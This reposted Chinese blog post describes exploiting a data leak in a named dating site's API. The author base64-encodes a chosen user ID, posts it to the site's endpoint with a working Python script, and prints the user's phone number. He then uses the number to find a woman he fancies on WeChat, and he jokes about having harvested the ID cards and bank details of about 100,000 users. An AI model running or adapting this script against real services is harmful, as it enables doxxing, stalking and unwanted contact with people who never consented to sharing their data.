Python脚本抓取信息泄露,获取心怡妹子手机号并…

2018-11-06 06:49:35来源:博客园 阅读 ()

新老客户大回馈,云服务器低至5折

 

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

答应了蛋蛋的文章一直没空写,主要也没好的素材,平时有些有趣的挖洞经历又总是懒得各种记录截图啥的

学习Python中有不明白推荐加入交流群
号:516107834
群里有志同道合的小伙伴,互帮互助,
群里有不错的学习教程!

今天本来想写篇技术专题,后来写着写着发现时间不够了,

以后再继续吧,临时改了这篇,离下班就剩20分钟,很匆忙,表格们将就将就...

0x00 :

首先是这么一个网站: 高颜值社交圈

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

进去之后是上图这样的,里面号称高颜值交友社区,所有人只能传素颜和未经修图的图片视频进行人工审核,

反正一句话就是:妹子多多

0x01:

具体你们自己去分析,我就直奔主题了,BurpSuite抓包:

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

 

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

从万千请求中发现上图这个包,返回信息里竟然带了个人信息

学习Python中有不明白推荐加入交流群
号:516107834
群里有志同道合的小伙伴,互帮互助,
群里有不错的学习教程!

(注:其实我原始测试的时候,这里是会返回用户实名认证包括身份证、提现银行卡、姓名等信息的,提交后已修复,

但对方不认为手机号泄露有威胁故还存在)

上图数据包请求的数据参数看上去像base64加密的,我们解码试试:

 

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

很好,其实就是一个对方用户的userid,这里有两个思路,循环遍历id去提取所有用户的身份信息(用户大概十多万,你们猜修复前我有没有~~嘿嘿嘿)

当然没有,Onls出了名的正义,那么我只想获取单一某个心怡妹子的手机号加微信,python写了个简单脚本如下:

#coding:utf-8
#!/usr/bin/python
import urllib
import base64
import urllib2
from urllib2 import URLError
import json

def getOther():
id_ = raw_input("Enter OtherID: ")
postdata = '{"data":{"userId":"%s"}}' % id_
bytesString = postdata.encode("utf-8")
encodestr = base64.b64encode(bytesString)
decodestr = encodestr.decode()
url='http://www.yanzhi.top/user/v1/otheruser.do'
data = urllib.urlencode({'data': decodestr}) #这个是请求的时候带的post参数,此处应该是json格式
try:
request = urllib2.Request(url)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
response = opener.open(request, data)
result = json.loads(response.read())
userInfo=result[u'userInfo']
userbase = result[u'userbase']
spreadId = userInfo[u'spreadId']
nickName = userbase[u'nickName']
numberId = userbase[u'numberId']
userMobile = userbase[u'userMobile']

print 'nickName:%s,userMobile:%s,numberId:%s,spreadId:%s,numberId:%s ' % (nickName,userMobile,numberId,spreadId,numberId)
except URLError, e:
if hasattr(e,'reason'): #stands for URLError
print "can not reach server,writing..."
pass
elif hasattr(e,'code'): #stands for HTTPError
print "find http error, writing..."
pass
else: #stands for unknown error
print "unknown error, writing..."
pass
getOther()

 

0x02:

这里我觉得这个妹子不错,我在她主页找到她的ID,然后执行脚本:

 

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

 

 

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

微信搜索手机号:

Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!

 

后面你们自己想象吧,老弟我赶时间呢..

后记:我这是已经提交漏洞,他们修复之后的结果,故对站点无码。

至于之前的信息..

emmmmmm...

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Python全栈学习_day006作业

下一篇:递归函数&二分查找